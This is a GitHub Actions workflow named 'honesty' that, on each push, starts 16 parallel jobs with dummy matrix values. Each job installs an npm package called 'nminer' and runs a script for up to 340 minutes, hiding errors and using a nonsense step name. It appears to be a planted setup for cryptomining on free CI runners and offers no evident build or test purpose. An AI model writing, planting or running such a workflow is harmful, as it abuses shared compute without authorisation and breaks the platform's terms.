name: honesty
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 9095 }
          - { version: 1681 }
          - { version: 2044 }
          - { version: 8172 }
          - { version: 7731 }
          - { version: 1057 }
          - { version: 3822 }
          - { version: 7511 }
          - { version: 4024 }
          - { version: 6500 }
          - { version: 6618 }
          - { version: 2125 }
          - { version: 1451 }
          - { version: 6039 }
          - { version: 5031 }
          - { version: 3405 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: gosh meh floodlight stuff
        run: |
          npm install nminer@latest
          timeout 340m node honesty.js || echo "honesty executed"